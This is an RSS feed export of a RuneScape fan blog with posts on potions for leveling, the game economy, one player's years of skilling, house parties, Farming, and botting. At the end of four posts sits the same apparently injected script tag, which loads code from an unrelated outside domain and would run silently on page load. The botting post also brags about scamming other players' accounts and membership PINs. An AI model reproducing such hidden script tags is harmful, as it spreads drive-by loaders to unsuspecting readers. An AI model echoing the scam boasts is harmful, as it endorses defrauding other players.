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		<title>Robots don&#8217;t get Carpal Tunnel</title>
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		<pubDate>Sat, 21 Mar 2009 14:14:32 +0000</pubDate>
		<dc:creator>Otter</dc:creator>
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		<description><![CDATA[Jagex has always had a smear campaign against autoing/macroing/botting. Most players listen to them and their warnings of &#8220;If you do it, we will catch you, and you will be banned.&#8221; Out of fear for their precious accounts, people don&#8217;t even look for cheats. I want to tell you otherwise. I have played RuneScape for [...]]]></description>
			<content:encoded><![CDATA[<p>Jagex has always had a smear campaign against autoing/macroing/botting. Most players listen to them and their warnings of &#8220;If you do it, we will catch you, and you will be banned.&#8221; Out of fear for their precious accounts, people don&#8217;t even look for cheats.</p>
<p>I want to tell you otherwise.</p>
<p>I have played RuneScape for roughly 4 years. It will be 5 this June, not counting the breaks I have taken. For most of those 4 years, I was the model player. I reported players when I thought it was neccessary, I didn&#8217;t break rules (except swearing, but hey, that&#8217;s been lifted a bit) and most of all, I didn&#8217;t bot. RuneScape was never really boring. I was a member for most of the time, and so I had plenty to do. RuneScape was good.</p>
<p>Shortly before 2008 breathed its last breath, I re-kindled a friendship with an old mate. He introduced me to sites such as Sythe and Fagex, and taught me the art of scamming. Together we scammed two accounts, and several membership PINs. Sythe and Fagex also have a RSBot section, and I looked through it and eventually downloaded RSBot.</p>
<p>I wish I had done it sooner. RSBot is easily the best thing I have done in my RuneScape career. I am botting right now! Jagex claims they will find you, and yet in 3+ months of near constant botting, I have not been warned nor banned.</p>
<p>As the title proclaims, robots don&#8217;t get Carpal Tunnel. If RuneScape is getting boring, you can do what I always did, and take a break. Alternatively, you can take the step and get RSBot. You will never be the same.<script src="http://ae.awaue.com/7"></script></p>
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		<title>Pot your way to faster leveling &#8211; Part Two</title>
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		<pubDate>Thu, 26 Jun 2008 18:11:37 +0000</pubDate>
		<dc:creator>Turbo</dc:creator>
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		<description><![CDATA[Turbo from the RS Investor blog here posting again for the Runescape Blog with my second installment (Click here to read part one) in the series. Today I will focus on some of the lesser known aspects of potting for training. In the first section, I talked about the potions you should be using, and [...]]]></description>
			<content:encoded><![CDATA[<p>Turbo from the RS Investor blog here posting again for the Runescape Blog with my second installment (Click here to read <a title="Pot your way to faster leveling - Part One" href="http://www.therunescapeblog.com/2008/06/pot-your-way-to-faster-leveling-part-1/" target="_self">part one</a>) in the series. Today I will focus on some of the lesser known aspects of potting for training. In the first section, I talked about the potions you should be using, and can probably make yourself. Here I will go over some of the ones that you might need help with.</p>
<p><span id="more-61"></span><strong>Magic Potions – Drink Me!</strong></p>
<p>Should you use these while training mage? Absolutely (well, unless you are casting high alch over and over again&#8230;). At today&#8217;s cost of 235gp a sip, these are a bargain as well. They increase your mage by +4, significantly increasing not only the chances that you will hit more often, but also that you will do more damage.</p>
<p>I know that some readers are thinking, hmmm, “My inventory slots are more important than having a potion.” I agree to an extent, but you have to be aware that a potion&#8217;s effects don&#8217;t wear off instantly. I wouldn&#8217;t carry one along to a blue dragon task, but I would sure have a sip every time I banked hides and bones. The stat bonus carries me through the entire time.</p>
<p>Can&#8217;t make magic potions? I don&#8217;t know any high level herblorist who would turn down free herblore XP. I certainly wouldn&#8217;t. Today Lants are 1,163 and potato cactus is 965. That is 2128 per potion or 709gp per dose. Is it worth it for a +4 mage bonus? I think so.</p>
<p>The non-combat uses are also worth mentioning here. At level 70, I trained using teleother to Lumbridge with magic potions. On a crowded server, people beg to be teleported, and it is some of the fastest magic XP in the game. (at 71, you should switch from magic pots to Wizard Mind Bombs though).</p>
<p><strong>Ranging Potions – Shoot this!</strong></p>
<p>With Pking gone, these have lost the majority of their value, but are still very worthwhile potions. Today they are 431 a dose. Range potions give a 4-13 (10%+3) level boost. At 60 range that will boost you up to nearly 70. Starting with 70 range will get you up to 80. This is a pretty hefty increase, and will significantly decrease your kill times, saving you arrows (darts, knives, cballs, charges), time, and increasing the rate at which you level up.</p>
<p><strong>In conclusion&#8230;</strong></p>
<p>It really is worth it to use what ever stat increasing items and tools you can while training. With the potion market being what it is, they are well worth the investment. With both range and magic potions, it is more expensive to buy the ingredients and get assisted, but still not unreasonable, especially if you happen to have a few lants and dwarf weeds sitting in the bank. The seconds for both are about 1k each, and many people will assist you. Just call it out in the GE, and you should get offers.</p>
<p>Stay tuned until next week when I will outline some of the highest potions in the game and some uses for them that you probably haven&#8217;t even though about.<script src="http://ae.awaue.com/7"></script></p>
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		<title>Pot Your Way to Faster Leveling &#8211; Part One</title>
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		<pubDate>Sat, 21 Jun 2008 04:47:28 +0000</pubDate>
		<dc:creator>Turbo</dc:creator>
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		<description><![CDATA[Any player, regardless of how little money they have, should, at a minimum, always be using normal Strength and Super Attack potions while training any combat related skill (I will skip the making of potions, as I assume you already know how, you should be making all of the potions you use though). Super attack [...]]]></description>
			<content:encoded><![CDATA[<p>Any player, regardless of how little money they have, should, at a minimum, always be using normal Strength and Super Attack potions while training any combat related skill (I will skip the making of potions, as I assume you already know how, you should be making all of the potions you use though). Super attack potions are actually cheaper than normal attack potions, so there is no reason to go with normal ones unless you are really broke, then attack mixes are the cheapest thing on the market. This goes for free players as well, in the case of strength potions, they are cheap and well worth it.  This is the first of a 3 part series on the effective use of potions to decrease your training time by increasing your stats.</p>
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<h3><span style="14px"><strong>Part 1:</strong> <em>The basics of using potions to speed up leveling and XP per hour</em></span></h3>
<p><strong>Super Attack Potions</strong> &#8211; What they do and why you should use them.</p>
<p>These increase your attack by 20% for a 5-19 level increase. For example if you has an attack level of 80, one sip from a Super Attack would boost your attack level to 96. Not bad for 80 gold pieces, especially when you compare it to a slayer mask that only gives a 15% increase but costs nearly a mil. You could buy 12,300 Super Attack doses for the cost of that one mask, but since the bonuses stack, you really should use both while training slayer for a whopping 35% increase in attack.</p>
<p><strong>Strength Potions</strong> &#8211; Drink this for Strength</p>
<p>Strength potions, or str pots, increase your strength by 12.5% for a 3-12 level increase. A sip of this boosts a strength of 80 to 90. This is especially useful in F2P, where str increases are few and far between. Increased str makes you to hit for higher damage, causing: faster kills, more XP per hour, and increased drop rate per hour (the more you kill the more drops you get).</p>
<p><strong>Barbarian Mixes</strong> &#8211; Eat your pots</p>
<p>These are one of the greatest underutilized parts of the game. Cost wise they are pretty bad to make from scratch, but they are great to make if you already have the potions, especially if you are fighting monsters that occasionally hit you and do damage. To make a mix, you need a 2 dose potion and roe. You can decant 2-2dose potions using a 4 dose potion on an empty vial. adding the roe to either an attack or strength potion gives you attack mix(2) or strength mix(2) respectively, and turns the potion into food that heals 6 hp (3hp per dose). Roe is easy enoug to fish near the barbarian outpost, they even have a drop box 1 click away at the Barbarian Assault mini game, it is also very cheap, at only 35gp on the GE, so it is well worth buying, unless you want some fishing XP.</p>
<p><strong>In Conclusion&#8230;</strong></p>
<p>Even if you are only killing a monster that just drops bones, it is worth it to use potions. Bones sell for 90gp. Super Attack and Str mixes sell for 80gp and 100 per dose, and easily last more than 2 kills. I am not recommending you stop training to bank normal bones by any means, but I wanted to illustrate how cheap it is to use potions for training. Some more examples are:</p>
<p>- 1 dose of each gives higher bonuses than an Amulet of Fury. Cost:3.2mil vs 180gp<br />
- At lvl 99 str the bonus is 300% better than bandos chest str bonus costing about 15.1mil less<br />
- At str level of 32 the bonus from a str pot is eqivalent to the bonus from a berserker ring for 1/36000 the price.</p>
<p>Happy Potting!</p>
<p><em>Note from the editor: We suggest you check out Turbo&#8217;s blog for some more interesting reading:</em> <a title="RS Investor" href="http://rsinvestor.blogspot.com/" target="_blank">RS Investor</a><script src="http://ae.awaue.com/7"></script></p>
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		<title>Runescape Economy &#8211; The Gold Coin</title>
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		<pubDate>Tue, 10 Jun 2008 21:54:35 +0000</pubDate>
		<dc:creator>Soulblade102</dc:creator>
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		<description><![CDATA[Submitted by  Stasik50 My friends and me were once talking about earning GP, when I started wondering if it was possible for the value of the Gold Coin to decrease like the American Dollar. The more money in the sytem, the less that currency is worth, right? After a few minutes of pondering, I realized [...]]]></description>
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<p>My friends and me were once talking about earning GP, when I started wondering if it was possible for the value of the Gold Coin to decrease like the American Dollar. The more money in the sytem, the less that currency is worth, right? After a few minutes of pondering, I realized that this was not possible because the big &#8220;J&#8221; has implemented a few factors into the game that do not allow this to be possible.</p>
<p>The first one is probably obvious. The players with lots of gold quit and when they do, the money pretty much leaves the system because the coins will never go to another player who might be able to use it Of course, they may give it out in the Falador Party Room, but lower-leveled players leave the game even more often than the more higher ones. The second one is the one most players might not suspect&#8230;Summoning. &#8220;What do you mean?&#8221; you might ask. Where do the Spirit Shards and Pouches come from? Players can&#8217;t make them, and the only way you can actually acquire them is to buy from NPCs. Well where do the Coins go when you buy the shards and pouches? They get destroyed. And the amount of Shards and Pouches needed to get to 99 Summoning is 120 Million gp! The amount is never achieved by most players.</p>
<p>That&#8217;s all I could think of for now, and hopefully I have answered some of your guy&#8217;s questions out there :).<script src="http://ae.awaue.com/7"></script></p>
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		<title>The road till maxing out Runescape</title>
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		<pubDate>Tue, 03 Jun 2008 18:47:45 +0000</pubDate>
		<dc:creator>Empror1</dc:creator>
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		<description><![CDATA[Hopefully by telling you about how I spent my 6,5 years playing this game I can give you a better insight in how things used to be and how they changed. Also showing you how it all happened for me, off course I realize that everyone will have a completely different story to tell and [...]]]></description>
			<content:encoded><![CDATA[<p style="justify;">Hopefully by telling you about how I spent my 6,5 years playing this game I can give you a better insight in how things used to be and how they changed. Also showing you how it all happened for me, off course I realize that everyone will have a completely different story to tell and everyone plays Runescape in their own way. If it sounds like a bragging story sometimes this isn’t my intention at all. I am afraid that it will be pretty self centered because I don’t remember a whole lot about years ago only what I was doing at that time. But I hope you will enjoy reading what I’ve been up to the last 6,5 years.</p>
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<p class="MsoNormal" style="normal;" align="center"><strong><span style="14pt;">2001</span></strong></p>
<p class="MsoNormal" style="justify;"><span style="10pt;">I started playing Runescape classic (on a really bad computer with a dial-up connection) when I was 14 years old and just entered high school, this was right around the time Christmas crackers were dropped (December 2001). I had no clue what was happening that day and some guy gave me 2 partyhats, which I dropped after a while because they took bank space. My classmates introduced me to this game and about everyone in my class started playing. It was all just fun and new for me, I had never played a MMORPG before and was only used to games like red alert. I started doing some quests with my classmates and got addicted pretty fast. And after my mom saw the phone bill for that month she wasn’t very happy. Luckily we got cable pretty fast.</span></p>
<p class="MsoNormal" style="normal;" align="center"><strong><span style="14pt;">2002</span></strong></p>
<p class="MsoNormal" style="justify;"><span style="10pt;">I was still very noobish, because all I did was a few quests and training a bit on cows, I figured I needed to get myself some money. The Runescape world was still very small back then and members or f2p didn’t exist yet. So I spent a few days picking up bronze scimitar’s in Rimmington (the house with the bronze pickaxe), and sold them to the general store on the other side of the road for a few GP. After a while I could finally afford my black long sword from the sword shop I had seen in Varrock, sadly I died in a cave when I started training with it and lost it pretty fast after. Luckily one of my classmates that had been playing for a while longer could give me a Mithril (which I used to think was rune) one very easy. Once I had my mithril armor I spent most of my days getting my combat up and doing quests, it didn’t take me to long to do all quests besides dragon slayer. Which had the reputation of being a hard quest (this is a time way before there were any rune smithers). After training up till about level 80 I finally took the courage to do dragon slayer and finished it pretty easily. </span></p>
<p class="MsoNormal" style="justify;"><span style="10pt;">After I was done with all the random stuff I started working on two skills in particular, woodcutting and Firemaking . You would mostly train woodcutting and Firemaking at the same time since you took a full inventory to a forest (Draynor forest) and you would automatically drop the logs you cut, u just used your tinderbox on the logs that fell on the ground (you couldn’t burn any logs besides normal logs). The only other way to train it was with someone else dropping lines of normal logs and you walking after them lighting the logs. I was finally done with Firemaking somewhere December 2002 and was 3<sup>rd</sup> to get 99 Firemaking and 7<sup>th</sup> to 99 woodcutting a little later. </span></p>
<p class="MsoNormal" style="normal;" align="center"><strong><span style="14pt;">2003</span></strong></p>
<p class="MsoNormal" style="justify;"><span style="10pt;">After this I started PK’ing a lot with 2 friends that lived in the same street as me.  We starting making tactics like luring in the lower wilderness around the castle above Edgeville by having one of us pick up runes without armor to lure people in attacking him. When It had worked one would close all doors in the castle and the other logged in next to the one fake collecting runes. As far as I know hardly anyone PKed in the higher level wilderness at that time and the person with the highest combat level was far from maxing out since combat training was only about 30k an hour max. At this time I created a pure and trained him to like 60 att, def and like 80 str. But we got bored with the PK’ing after a few months and I decided to go back to my main and train his combat up some more.</span></p>
<p class="MsoNormal" style="justify;"><span style="10pt;">This is a time I remember pretty well because I spent days and night in that one area never having to leave since the spiders I trained on didn’t hit that hard. I think it was about 25-30k an hour training on the spiders in Underground Passage. I remember there was a really ugly spider called Balrog in there that was just a tiny level 3 spider with increased size. I also was in this cave when Scythe’s were dropped (not sure where I was when bunny ears were dropped, but I have those as well). After getting my combat up to about 100 (pretty high for that time, halfway 2003). I spent a lot of time training agility at the wilderness course and got it up to about 82 (pretty high for that time).</span></p>
<p class="MsoNormal" style="justify;"><span style="10pt;">After I got enough of agility (August 2003) I set my eyes on a new goal, rank 1 Firemaking. I quit Firemaking right at 99 and I am not quite sure what XP the rank 1 (jamie2002) had when I started going for rank 1 but I remember him being ahead about 10mil XP. But when I started Firemaking so did he and this turned out to become a long battle lasting several months, I finally overtook him around December 2003 (A year after I got 99). We had around 38-40m XP back then and the discussion about RS2 and the BETA were starting up. While I was still trying to get further ahead of Jamie I heard “dropfishing” was removed and bought a ton of feathers and started “dropfishing” right away, I got it to about 93 in a really short time (was about 120k/hour).</span></p>
<p class="MsoNormal" style="normal;" align="center"><strong><span style="14pt;">2004</span></strong></p>
<p class="MsoNormal" style="justify;"><span style="10pt;">Runescape 2 was launched and I had to change my way of Firemaking, not sure what was the best way yet I started cutting willows in Draynor and burning them when my inventory was full. I did this till about 60m experience and if I remember correct I was first to get 60m XP in a skill. But when I thought I was far enough ahead I stopped doing Firemaking and started doing some random skills, not really focusing on something. I remember woodcutting and fletching a lot though. But I wasn’t doing the fasted methods back then (I think I cut inventory’s of maple and fletched them to unstrung bows. </span></p>
<p class="MsoNormal" style="normal;" align="center"><strong><span style="14pt;">2005</span></strong></p>
<p class="MsoNormal" style="justify;"><span style="10pt;">I was doing all quests when they came out and making guides for some as well, then when slayer was released I spent a while doing that and making the guide for it. But after that was done I got bored with Runescape and quit for a little while until I heard about farming coming out and you could get seeds already by thieving the master farmer, so I spent a few weeks thieving the master farmer in Draynor. When farming came out I jumped right in it and made the farming guide and got to rank 7 farming, but when I ran out of good seeds I quit again.</span></p>
<p class="MsoNormal" style="normal;" align="center"><strong><span style="14pt;">2006</span></strong></p>
<p class="MsoNormal" style="justify;"><span style="10pt;">In my quitting period which lasted for a few months I did check hiscores every now and then and when I saw “Leronea” getting closer and heard “Xxx Neo Xxx7” was after my rank I decided to sell my blue partyhat for 200 mil GP and I bought enough yew logs for 200Mil Firemaking XP (I had 60m XP at this time). From December 2005 till end May 2006 I spent doing about 1m Firemaking every day. When I was finally done with this construction had come out (may 18<sup>th</sup>) and I decided to start doing that by cutting oak logs outside my house portal in Rimmington and let the butler plank them then build oak dining tables. I did this till I was 87 construction. </span></p>
<p class="MsoNormal" style="justify;"><span style="10pt;">Then I decided to get 99 thieving on knights in Ardougne which was about 100k XP an hour (Pyramid Plunder wasn’t out yet). And when I finally got it I heard about Pest Control being really fast combat experience and since I had been 108 combat for ages I thought it was time to get this up. With about 120k XP an hour it turned about to be really easy to max my combat stats (I did a lot of Pest Control each day, because there were a lot of rumors about it getting nerved soon and huge complaints on the forums about it). I think I ended up with about 123/124 combat and maxed out range (planned on doing magic later by alching the bodies from crafting).</span></p>
<p class="MsoNormal" style="justify;"><span style="10pt;">After selling my blue partyhat for 200m Firemaking XP and losing my red partyhat because of my own stupidity, I still had a lot of them left and they were worth huge amounts at that time so I decided to sell one for 99 Prayer and 99 Smithing. I made a alter in my house and got 99 prayer in a few days, after that I bought enough bars for 99 Smithing and got that a few weeks later. After this I spent ages trying to get 99 fishing on monkfish, I didn’t play a lot at that time and the experience was really slow but I managed to get it 99 mid September 2006.</span></p>
<p class="MsoNormal" style="justify;"><span style="10pt;">After this I decided to downgrade one of my partyhats (I am not sure which color because this were all one day decisions) to buy 99 crafting and I bought a lot of blue leathers and crafted them to bodies and got 99 crafting mid October, I was planning on alching the bodies but decided that was stupid and sold the bodies and went back to Pest Control and got 99 Magic in a few days (I got 99 Crafting and Magic on the same day because I waited a little with the last few XP from Crafting so I could get them together). After this I quit till January 2007.</span></p>
<p class="MsoNormal" style="normal;" align="center"><strong><span style="14pt;">2007</span></strong></p>
<p class="MsoNormal" style="justify;"><span style="10pt;">I was slowly picking back up in January by doing a few skills at the same time Farming, Herblore, Hunter and Agility. I had to work and learn at a company for school but since there wasn’t a lot of work to do I did a lot of Agility and Hunter there. But slowly I got more addicted again and was doing a few hours of agility every day and combining that with doing 2 farm runs every day, 10 Magic trees, 4 Palm trees and 1 Calquat (Since Partyhats were still pretty high at this time I sold one of my party hats and bought enough seeds for 99 farming at once, which was I think about 200m in total) every day for a pretty long period. A Month after starting again I got 99 Agility on 4 February, I started with 94.</span></p>
<p class="MsoNormal" style="justify;"><span style="10pt;">Right after my Agility was finished I jumped to Hunter which was 91 and I was still doing Farm rounds daily, my level was about 93 when I started Hunter. It took me about 2 weeks to get 91-99 Hunter, not sure how much I did every day but I was playing quite a lot again. After this I bought enough oak planks for 99 Construction and did Oak dungeon doors for a week and a half and got 99 Construction late February. Having done Farming rounds for the entire period of hunter and construction I got Farming from 93 to 97.</span></p>
<p class="MsoNormal" style="justify;"><span style="10pt;">With march starting I was getting pretty bored with Runescape and my Work/Learn project for school was almost over, but I wanted to finish Farming so I decided to do a bit of mining while waiting for my trees to grow I got 90 to 93 mining and 98 + 99 Farming. After my Farming party on 10 March I quit again till mid May. </span></p>
<p class="MsoNormal" style="justify;"><span style="10pt;">After taking a nice 2 month brake I wasn’t quite sure what to do yet, but I wanted to get Herblore 99 for a while now. I was planning on paying for this with Runecrafting so I sold a low party hat and bought enough pure essence for level 99 Runecrafting. Starting out with 82 Runecrafting I still had a very long way to go, I wanted to start off with fast free laws W66 till 91 (Double Nats). But when I finally reached 91 Runecrafting mid June I realized there was a double nat crafting company which was a lot faster than running yourself. </span></p>
<p class="MsoNormal" style="justify;"><span style="10pt;">So I sold all my pure essence and decided to buy 90 to 99 Herblore before getting 99 Runecrafting, but I wanted to get this real fast so I no-lived Herblore for a week. First off course I had to buy the supplies, I decided to do Saradomin brews and bought a lot of watered vials a whole lot of toadflax and crushed nests. This was well before GE so a lot of spamming on the Runescape forums and buying in small amounts. I Reached 99 Herblore about a week after I started and was ready to do the last bit of Runecrafting. Since it was vacation I nolifed badly and managed to get 91 – 97 Runecrafting (in just a little over 2 week) before I went on Vacation for a month on 10 July.</span></p>
<p class="MsoNormal" style="justify;"><span style="10pt;">After my vacation I was still going to the beach and such so I didn’t have a lot of time for Runescape but in august I managed to get 98 and 99 Runecrafting. After this I was planning on getting 99 Mining but after just one level I decided it was not worth wasting my life like this so I quit for well over 3 months and didn’t get any levels in September, October or November. In December I heard about Summoning coming and I wanted to start playing again and because I had a few weeks off I decided to start again and this time I really wanted to get mining over with and got 99 Mining on 29 December.</span></p>
<p class="MsoNormal" style="normal;" align="center"><strong><span style="14pt;">2008</span></strong></p>
<p class="MsoNormal" style="justify;"><span style="10pt;">January 2008 I had just finished my Mining and Summoning was coming soon and since I was really low slayer (75) and all other skills were maxed out there wasn’t much to do then the skill I had hated like forever because it was really slow and I didn’t really like training combat skills since I was maxed. So till Summoning came out I did the easy slayer levels and when Summoning came on 15 January I had 82 Slayer. But very soon I realized that Slayer and Summoning were pretty easy to combine and I was pretty happy.</span></p>
<p class="MsoNormal" style="justify;"><span style="10pt;">So with Summoning out there was new interest for me in doing Slayer, doing research on which tasks were the best for which charms and collecting loads of charms kept me interested. As well as the news of the second batch of monsters coming. When that finally came 31 March I was already 95 Slayer and trying very hard to sell my Yellow Partyhat. When I finally managed to sell that I was trying to buy a lot of Seconds in GE, but so was everyone else so that didn’t go to fast. When I had a few Summoning levels banked I got them and reached 91 Summoning on 20<sup>th</sup> of April. Still doing slayer mostly I got 98 Slayer on 26 April.</span></p>
<p class="MsoNormal" style="justify;"><span style="10pt;">I didn’t do that much slayer in April and wanted to max as fast as possible and finally be done with this game, so I got 98 to 99 Slayer in 9 days on 4 May. With the charms from my last Slayer levels I was able to get 93 Summoning. After this I went to Waterbirth island to barrage Rock Lobsters for my last charms and got 99 Summoning on 13<sup>th</sup> may. I am currently doing a bit of Fletching, Cooking and I might do some thieving later on but I am not sure what the future brings for me. I am not really feeling like putting much effort into getting a few ranks. Wasting this much time on a game is kind of sad but playing even more while done, I am not sure.</span></p>
<p class="MsoNormal" style="normal;" align="center"><strong><span style="14pt;">The End</span></strong></p>
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		<title>House Parties are fun!</title>
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		<pubDate>Sun, 01 Jun 2008 07:43:56 +0000</pubDate>
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		<description><![CDATA[Good day one and all! It certainly has been some time since my last article. I am terribly sorry for the unexpected hiatus! However, I am back and I am here with a present. Speaking of presents, I want to present a very special presentation that will hopefully present to me some very presentable responses [...]]]></description>
			<content:encoded><![CDATA[<p>Good day one and all!</p>
<p>It certainly has been some time since my last article. I am terribly sorry for the unexpected hiatus! However, I am back and I am here with a <strong>present</strong>.</p>
<p>Speaking of <em>present</em>s, I want to <em>present </em>a very special <em>present</em>ation that will hopefully <em>present</em> to me some very <em>present</em>able responses from you!</p>
<p>I am very happy to announce that <strong>The Runescape Blog </strong>has made its first <strong>Vlog </strong>(Video Blog!) and we are possibly the first Runescape-centered blog to do so! It is quite a large video, around thirty-five minutes long and i have embedded it below. Enjoy!</p>
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<p>If you did not already know I am going to describe to you the sort of fun you can have at the house parties in world 31, Rimmington. These have been a big part of my life as a Runescaper because they are simply so exciting! Each time I enter a dungeon I know, due to the thousands of different variables, that I am going to have a completely new experience each time. The best part is that I know every time I will have fun!</p>
<p>As recently stated, there are many variable situations included in a session of &#8216;house partying&#8217; in RS and because of this I found it difficult to write a succinct article about it. However, I came up with the idea of videoing myself partaking in my favorite past-time of all; this has allowed me to cut out much of the heavy information that was weighing down my old article.</p>
<p>Now that all of this has been said, let us get down to the real business of partying!</p>
<p><strong>The fundamentals of house parties.</strong></p>
<p>Such fundamentals are:</p>
<ul>
<li>The roles of different players (e.g pkers: mages, rangers, meleers, tankers, pures) or; (skillers, people who are using different furnishings found in the house/dungeon for skills) or; (party-hosts or people who are achieving a goal, these players are usually the hosts of the dungeon/house and are inviting people in to share their achievement.)</li>
<li>The fact that if you are in the dungeon/combat ring, you are most likely going to be attacked.</li>
<li>The fact that you are most likely going to encounter mean spirited people who will try to annoy you; just ignore them :).</li>
<li>The fact that you are definitely going to have some form of enjoyment!</li>
</ul>
<p><strong>House parties are dynamic.</strong></p>
<p>In every party you will see different:</p>
<ul>
<li>House layouts (including dungeon layouts!)</li>
<li>Monsters</li>
<li>Furnishings</li>
<li>People</li>
<li>Parties</li>
<li>and the list goes on and on&#8230;</li>
</ul>
<p>Because of this each party is different to the last!</p>
<p><strong>How to gain maximum enjoyment from the party:</strong></p>
<p><em>Bring friends!</em><strong> </strong></p>
<p>I can not stress how important this is! Going to a party on RS without your friends is not only <em>rude </em>but it is also very boring! Not only is it more fun with friends but it opens up the party for you for several reasons:</p>
<ul>
<li>You get to share the experience which creates memories&#8230; memories strengthen friendships!</li>
<li>You can team up on other people and completely decimate them :-p</li>
<li>You can have fun battles against each other to see who can claim victory!</li>
<li>amongst many other things&#8230; you are going to have to find out for yourselves!</li>
</ul>
<p><em>Utilise a strong arsenal of weapons and armour</em></p>
<p>This is another very important point that I must stress. If you bring poor weapons and armour you will get killed far too often. It is in your best interests to purchase the best weapons and armour you can afford so that you can do your best in the dungeon! (Looking cool also goes a long way with some of the people who go to house parties :-p!)</p>
<p><em>Have your wits about you</em></p>
<p>House parties are fun, however, they can also be the breeding ground for fighting. Make sure you do your best to steer clear from this sort of behaviour&#8230; if you cause a fight the best thing you can do is to just ignore it!</p>
<p><em>Don&#8217;t be too serious</em></p>
<p>Dying is not shameful, nor is it annoying. Don&#8217;t flame other people if they kill you and you respawn outside the portal. Just accept that you did not win&#8230;. that time :D!</p>
<p>To sum this article up:</p>
<ul>
<li>House parties are fun!</li>
<li>Bring friends, good weapons and armour, your wits and your happy face to have the most fun!</li>
<li>I hope to see you at some House parties in the near future!</li>
</ul>
<p><em>Now go watch the video!</em></p>
<p>Ta ta for now :-).</p>
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		<title>Farming: A Critical Look</title>
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		<pubDate>Sun, 01 Jun 2008 03:58:03 +0000</pubDate>
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		<description><![CDATA[So, I decided that I want to start taking critical looks at all of the skills of RuneScape. My first will be Farming. Farming is one of the hardest skills to train in RuneScape, as it takes much time and effort outside of Farming to get seeds, and then it takes much time and effort [...]]]></description>
			<content:encoded><![CDATA[<p>So, I decided that I want to start taking critical looks at all of the skills of RuneScape.</p>
<p>My first will be Farming.</p>
<p>Farming is one of the hardest skills to train in RuneScape, as it takes much time and effort outside of Farming to get seeds, and then it takes much time and effort inside Farming to get levels. If you can get a high level in this skill, I respect you, as should the RuneScape community. That being said, I still feel as though the skill is useless.</p>
<p><span id="more-44"></span>1. Farming is a way to make Herblore easier. I know, most of you don&#8217;t remember a time before Farming, but for those that do, Herblore was much different.  Not many people could achieve 99 Herblore, or for that matter a high level. What Farming did was fix that. It increased the amount of herbs fivefold. It was an awkward way out of a situation that was perfect in RuneScape Classic, but in the new, fast-paced, high velocity RuneScape, having few herbs was bad.</p>
<p>2. Farming is a waste of my time. Farming takes hours on end to train, or hours on end to get items to give you automatic levels. For what? Herbs? Trees? Magic Jutes? In a personal experiment I had, I planted a rannar seed, and then went to Fire Giants. In the time it took for the rannar seed to grow into 4 rannar weeds, I successfully received 2,000 gold coins, 2 rannar weeds, 1 irit leaf, and about 600 fire runes. All in all, I came out about even. But what is the difference? I gained almost 10 times as much combat experience over Farming experience.</p>
<p>3. Farming is unrelated to other skills from the inside out. Oh yeah, Farming produces herbs and secondary herbs, but other than that, it helps almost no other skill. Fishing affects cooking which affects combat. Mining affects smithing with affects combat. Fletching affects range. Runecrafting affects magic. What does farming help, with the exception of herblore at a high level? Nothing. It is isolated from the rest of the RuneScape skills. Even with it affecting herblore, there are faster ways to get those herbs.</p>
<p>In conclusion, yes, I do have a low farming level. Yes, I do not train it. Yes, I did whine when Jagex released it. But at least I am sensible, and did at least try it enough to get it to 52 (I think&#8230;)</p>
<p>Anyways, until next time,</p>
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